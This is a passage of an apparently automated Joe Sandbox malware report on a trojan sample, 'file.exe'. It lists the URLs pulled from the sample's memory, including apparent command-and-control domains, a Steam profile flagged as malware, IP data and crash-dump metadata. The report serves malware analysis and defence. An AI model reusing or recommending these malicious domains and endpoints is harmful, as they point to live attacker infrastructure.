    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://bathdoomgaz.store:443/api | file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://steamcommunity.com/?subsection=broadcasts | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://sergei-esenin.com/ | file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
    https://store.steampowered.com/subscriber_agreement/ | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.gstatic.cn/recaptcha/ | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.valvesoftware.com/legal.htm | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.youtube.com | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.google.com | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://eaglepawnoy.store:443/apiP | file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://s.ytimg.com; | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://steam.tv/ | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://licendfilteo.site:443/api | file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://store.steampowered.com/privacy_agreement/ | file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://steamcommunity.com:443/profiles/76561199724331900 | file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
    https://store.steampowered.com/points/shop/ | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://sketchfab.com | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://lv.queniujq.cn | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://steamcommunity.com/profiles/76561199724331900/inventory/ | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
    https://www.youtube.com/ | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://store.steampowered.com/privacy_agreement/ | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.cloudflare.com/learning/access-manag | file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://www.cloudflare.com/5xx-error-landing | file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749627824.0000000001326000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://sergei-esenin.com:443/api | file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.google.com/recaptcha/ | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://checkout.steampowered.com/ | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://avatars.akamai.steamstatic | file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://store.steampowered.com/;file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://store.steampowered.com/about/file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://help.steampowered.com/en/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://steamcommunity.com/market/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://store.steampowered.com/news/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://community.akamai.steamstatic.com/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://sergei-esenin.com/0file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://dissapoiznw.store:443/apifile.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://sergei-esenin.com/apiAfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmptrue
                    unknown
                    https://store.steampowered.com/stats/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://medal.tvfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://sergei-esenin.com/apirt.cfile.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmptrue
                      unknown
                      https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://clearancek.site:443/apifile.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://sergei-esenin.com/api0file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://login.steampowered.com/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://store.steampowered.com/legal/file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://sergei-esenin.com/C:file.exe, 00000000.00000002.1951560374.00000000012B3000.00000004.00000020.00020000.00000000.sdmptrue
                                  unknown
                                  https://recaptcha.netfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://upx.sf.netAmcache.hve.4.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://store.steampowered.com/file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://studennotediw.store:443/apifile.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://127.0.0.1:27060file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP              Domain              Country        ASN    ASN Name         Malicious
104.21.53.8     sergei-esenin.com   United States  13335  CLOUDFLARENETUS  true
104.102.49.254  steamcommunity.com  United States  16625  AKAMAI-ASUS      true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1532904
                                      Start date and time:2024-10-14 06:51:06 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 1s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@3/5@11/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
00:52:05  API Interceptor  2x Sleep call for process: file.exe modified
00:52:26  API Interceptor  1x Sleep call for process: WerFault.exe modified
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.0288199864711824
                                                          Encrypted:false
                                                          SSDEEP:192:Ph6Gq5MszGvkQPlktS0BU/fI3juFjnzuiFdZ24IO8TVB:/1kQN6ZBU/YjozuiFdY4IO8X
                                                          MD5:E8F5BB7E5F5DA5BF11B990E3150BDBEA
                                                          SHA1:0F00FAF4A71DB0CDD04F2BA02D563658020463F0
                                                          SHA-256:3C44FE2DEFB4A5CCE197D69A3A70626E1F8D859E388DF5E715CC8DDE50609FD1
                                                          SHA-512:0B995D057BD893FDF7EF65F106BB24EF2339E19E58E85A96D27681408EF5ABB8D73C835C53B0377980491FCDA5BC34A93E3CEB41F14D49A0C05BB380A0B0623C
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.5.5.1.2.8.4.9.5.1.1.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.5.5.1.3.0.4.7.9.5.0.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.2.b.b.5.2.a.-.8.c.e.2.-.4.c.8.1.-.a.c.1.0.-.6.1.5.1.c.e.2.8.c.8.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.5.d.e.c.1.6.-.5.7.d.2.-.4.4.a.d.-.9.7.f.a.-.d.8.7.2.8.8.8.3.e.b.5.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.4.c.-.0.0.0.1.-.0.0.1.4.-.a.8.d.e.-.2.e.c.f.f.4.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.9.c.1.9.9.c.7.2.0.a.2.e.1.0.6.8.2.2.d.e.f.b.a.0.3.2.c.2.e.b.9.0.f.9.6.9.9.d.a.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Mon Oct 14 04:52:09 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):282316
                                                          Entropy (8bit):1.47926559278303
                                                          Encrypted:false
                                                          SSDEEP:768:YnVRABtr2f0k8qFYIBbki7r/qBt03SonQSXCwFvj8Y:YVI8KIBbXqBt0ionSwFh
                                                          MD5:50E8EFCBBB02323B5C471604E595F5D0
                                                          SHA1:033560388EEF1B3FF42463D0D8F1B5F4C0D9C7FF
                                                          SHA-256:5E48F30588085CB723FF15448330AD16D8239FD3212E5DA7BDE72E532B35BCC7
                                                          SHA-512:4C35817C50B5E2FFABFB1190E01A7D0BC7F1505A7AD32AACDA387E4A4BE606A07F886F3C7523D324DD57DC8057C87428004BF56B98C626B8C9EACCD3CF0B87BD
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... .......y..g........................T...........T....&..........<...........`.......8...........T...........HJ..............P'..........<)..............................................................................eJ.......)......GenuineIntel............T.......L...r..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8292
                                                          Entropy (8bit):3.6880305510308826
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJFCI6f6Y9MSU9rVgmfBGedprm89bQusfvsAQm:R6lXJH6f6YWSU9rVgmfZPQtfz
                                                          MD5:47725824D9747DAF62937A33D150A84B
                                                          SHA1:AAE2A555CC6DD61EE3BCA52214ADFD2B83904BFC
                                                          SHA-256:2476F49A2EA7AABDED88B9F9977D9DF00CA1880938DDA851740D776F947056FF
